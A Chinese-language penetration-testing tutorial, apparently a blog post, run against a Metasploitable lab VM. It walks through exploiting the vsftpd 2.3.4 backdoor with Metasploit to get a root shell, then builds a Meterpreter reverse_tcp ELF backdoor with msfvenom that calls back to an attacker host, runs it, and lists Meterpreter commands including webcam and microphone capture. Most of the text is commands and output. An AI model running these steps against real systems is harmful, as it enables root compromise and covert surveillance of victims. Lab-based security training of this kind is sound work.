本章节介绍使用Metasploit对FTP漏洞进行渗透测试。

首先，配置一个postgresql实例。

1、启动postgresql

➜  ~ systemctl start postgresql
➜  ~ systemctl status postgresql
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; 
   Active: active (exited) since Mon 2019-07-08 11:16:50 EDT; 11s ago
  Process: 3069 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
 Main PID: 3069 (code=exited, status=0/SUCCESS)

Jul 08 11:16:50 kali systemd[1]: Starting PostgreSQL RDBMS...
Jul 08 11:16:50 kali systemd[1]: Started PostgreSQL RDBMS.
                  
➜  ~ systemctl enable postgresql
Synchronizing state of postgresql.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable postgresql
Created symlink /etc/systemd/system/multi-user.target.wants/postgresql.service → /lib/systemd/system/postgresql.service.

2、创建用户msf，密码123456
3、创建数据库msf

➜  ~ sudo -u postgres psql
psql (11.1 (Debian 11.1-2))
Type "help" for help.

postgres=# create user "msf" with password '123456' nocreatedb;
CREATE ROLE
postgres=# create database "msf" with owner="msf";
CREATE DATABASE

第二步，使用Metasploit进行渗透。

1、登录msfconsole控制台

➜  ~ msfconsole 
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

msf5 > 

2、连接一个db实例

msf5 > db_connect msf:123456@127.0.0.1/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 > db_status
[*] Connected to msf. Connection type: postgresql. Connection name: zF0rip8x.

3、使用nmap探测目标FTP

msf5 > db_nmap -sV -p 21 10.0.2.5
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-08 11:34 EDT
[*] Nmap: Nmap scan report for 10.0.2.5
[*] Nmap: Host is up (0.00037s latency).
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 21/tcp open  ftp     vsftpd 2.3.4
[*] Nmap: MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
[*] Nmap: Service Info: OS: Unix
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds

4、查看一下数据库探测记录

msf5 > services
Services
========

host      port  proto  name  state  info
----      ----  -----  ----  -----  ----
10.0.2.5  21    tcp    ftp   open   vsftpd 2.3.4
10.0.2.5  2121  tcp    ftp   open   ProFTPD 1.3.1

5、搜索漏洞代码

msf5 > search vsftpd 2.3.4

Matching Modules
================

   Name                                                      Disclosure Date  Rank       Check  Description
   ----                                                      ---------------  ----       -----  -----------
   auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
   exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
   exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

6、设置payload相关配置

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor  
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Check  Description
   ----               ---------------  ----    -----  -----------
   cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set playload cmd/unix/interact
playload => cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.0.2.5
rhosts => 10.0.2.5

7、查看配置是否成功

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.0.2.5         yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

8、执行exploit攻击，获得shell

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.0.2.5:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.2.5:21 - USER: 331 Please specify the password.
[+] 10.0.2.5:21 - Backdoor service has been spawned, handling...
[+] 10.0.2.5:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.0.2.12:41947 -> 10.0.2.5:6200) at 2019-07-08 11:44:36 -0400

whoami
root
id
uid=0(root) gid=0(root)
pwd
/

第三步，注入更强大的Metapreter的PayLoad

1、查找payload

➜  ~ msfvenom --list payloads | grep linux | grep meterpreter| grep x86 |  grep reverse_tcp      
    linux/x86/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
    linux/x86/meterpreter/reverse_tcp_uuid              Inject the mettle server payload (staged). Connect back to the attacker
    linux/x86/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)

2、查看payload参数设置

➜  ~ msfvenom -p linux/x86/meterpreter_reverse_tcp --list-options
Options for payload/linux/x86/meterpreter_reverse_tcp:
=========================


       Name: Linux Meterpreter, Reverse TCP Inline
     Module: payload/linux/x86/meterpreter_reverse_tcp
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 1022972
       Rank: Normal

Provided by:
    Adam Cammack <adam_cammack@rapid7.com>
    Brent Cook <brent_cook@rapid7.com>
    timwr

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port

3、创建payload

➜  ~ msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=10.0.2.12 -f elf > /tmp/backdoor.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1022972 bytes
Final size of elf file: 1022972 bytes

4、启动监听

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 10.0.2.12
LHOST => 10.0.2.12

msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.2.12:4444 

5、利用FTP漏洞上传payload，参考文章《FTP漏洞原理及利用》
6、利用第二步获得的shell执行漏洞

chmod +x /tmp/backdoor.elf
chown root. /tmp/backdoor.elf
ls -l /tmp
total 1004
-rw------- 1 tomcat55 nogroup       0 Jul  8 10:41 4480.jsvc_up
-rwxr--r-- 1 root     root    1022972 Jul  8 12:07 backdoor.elf
/tmp/backdoor.elf

7、获取到反弹shell（可以执行meterpreter命令的哟！）

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.2.12:4444 
[*] Sending stage (914728 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:42620) at 2019-07-08 12:18:42 -0400

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getpid
Current pid: 4909
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > ?

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    chmod         Change the permissions of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    shell         Drop into a system command shell
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Mic Commands
====================

    Command       Description
    -------       -----------
    listen        listen to a saved audio recording via audio player
    mic_list      list all microphone interfaces
    mic_start     start capturing an audio stream from the target mic
    mic_stop      stop capturing audio


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk

推荐汇总贴： 漏洞利用套路汇总